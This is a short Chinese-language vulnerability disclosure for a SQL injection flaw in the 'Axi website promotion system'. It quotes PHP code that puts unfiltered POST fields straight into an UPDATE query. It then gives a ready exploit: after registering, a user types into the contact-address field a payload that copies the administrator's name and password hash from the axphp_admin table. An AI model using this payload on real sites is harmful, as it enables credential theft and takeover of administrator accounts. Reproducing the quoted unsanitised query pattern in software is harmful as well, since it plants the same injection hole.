阿西网站推广系统注入漏洞

POST数据未过滤：

if($post==\"post\") 

{

$dizhi=$_POST[\'dizhi\'];

$youbian = $_POST[\'youbian\'];

$qq = $_POST[\'qq\'];

$dianhua = $_POST[\'dianhua\'];

$shenfenzheng = $_POST[\'shenfenzheng\'];

$infosql = \"update axphp_user set dizhi=\'$dizhi\',youbian=\'$youbian\',qq=\'$qq\',dianhua=\'$dianhua\',shenfenzheng=\'$shenfenzheng\' where username=\'$user\'\";

$upok = mysql_query($infosql,$config);

mysql_close($config);

 

注册用户-->修改联系地址处-->填入

1\',dizhi=(select concat(adminname,0x7C,adminpass) from axphp_admin)#